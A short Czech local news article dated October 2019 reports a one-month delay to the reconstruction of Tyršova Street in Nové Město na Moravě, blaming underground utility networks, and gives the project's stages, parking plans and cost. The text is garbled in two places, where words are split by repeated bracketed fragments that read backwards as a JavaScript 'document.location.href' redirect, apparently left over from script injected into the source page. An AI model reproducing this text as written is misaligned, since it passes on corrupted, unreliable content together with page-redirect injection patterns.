Rainbow page separator

Stavební práce v novoměstské Tyršově ulici nabraly zpoždění

Středa, 2. října 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Nikoliv do konce října, ale o měsíc déle potrvá rekonstrukce první části novoměstské Tyršovy ulice. Zdržení je důsledkem velkého množství technických sítí vedoucích pod povrchem vozovky, přičemž některé z nich byly ve špatném stavu a jiné musely být přeloženy. V místě je hlavní trafostanice E.ONu a také tam kdysi stávala telefonní ústředna, po které zbyly různé kabely. Tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se následně posunuly i navazující stavební práce, zejména rekonstrukce vodovodu a kanalizace.
Modernizace Tyršovy ulice je naplánovaná ve dvou etapách. První z nich se týká právě prováděného „dolního“ úseku od policejní služebny ve Žďárské ulici, což probíhá od konce června, druhá pak zahrne část od křižovatky ulic Tyršova a Křenkova po křižovatku Tyršova – Monseova.
V Tyršově ulici po rekonstrukci kromě nového povrchu přibudou rovněž parkovací místa. Přestavba lokality městskou kasu vyjde na přibližně patnáct milionů korun, přičemž na stávající stavební práce v příštím roce naváže ještě výstavba dalších parkovacích stání v horní části ulice.